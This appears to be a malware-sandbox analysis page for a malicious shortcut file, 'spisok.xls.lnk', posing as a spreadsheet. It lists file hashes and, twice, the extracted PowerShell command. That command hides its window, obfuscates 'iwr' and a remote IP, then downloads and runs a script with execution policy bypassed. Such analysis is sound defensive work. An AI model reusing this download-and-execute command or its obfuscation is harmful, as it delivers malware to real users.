General
Structural Analysis
Config.0
Yara Rules26
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 042e9517635c79baed62e6a6d68cb83e
|
| Sha1 | c1533f981962cd1932d905be4a8653896384d893
|
| Sha256 | 560c13111a07b56734f8456637e9ba9021a84f58347bde2d412937c43b05f12f
|
| Sha384 | 53ab5de93f7685be137ce32721199f804b4633867ebf57482854a66cebb5e9bf77695b2eeaa201c048b58a0181f297fe
|
| Sha512 | c926453e22aeeafebc36326ca355b414296b60fb4ff4b16186572ce936666c958e59297cc1083fb3dba85ec9eb928d40e409a984e5c58eabbbd2985019e12a20
|
| SSDeep | 24:xG/qifP6CnCEfPCzuikVQ4jnsNyxWaAl73lUt8GOUba//sY:x2H6yxfPKYVQ4jnkpUtbHa//sY
|
| TLSH | 50925E306F75020CF4736E3DE8769215586A347C9A32D74C1440DA9AC932A01D7B6F2E
|
File Structure
042e9517635c79baed62e6a6d68cb83e
Malicious
spisok.xls.lnk
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe /w 1 echo LJaOYJhcYWSDpHfJQd; $a = -join (0x69,0x77,0x72 | % {[char]$_}); .($a) -uri http:''/''/''18''5''.2''08.1''5''8''.''126/sss04n111k/draft.ps1 -OutFile draft.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:ProgramData\draft.ps1" |
042e9517635c79baed62e6a6d68cb83e (19.66 KB)
File Structure
042e9517635c79baed62e6a6d68cb83e
Malicious
spisok.xls.lnk
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe /w 1 echo LJaOYJhcYWSDpHfJQd; $a = -join (0x69,0x77,0x72 | % {[char]$_}); .($a) -uri http:''/''/''18''5''.2''08.1''5''8''.''126/sss04n111k/draft.ps1 -OutFile draft.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:ProgramData\draft.ps1" Malicious |
042e9517635c79baed62e6a6d68cb83e > spisok.xls.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.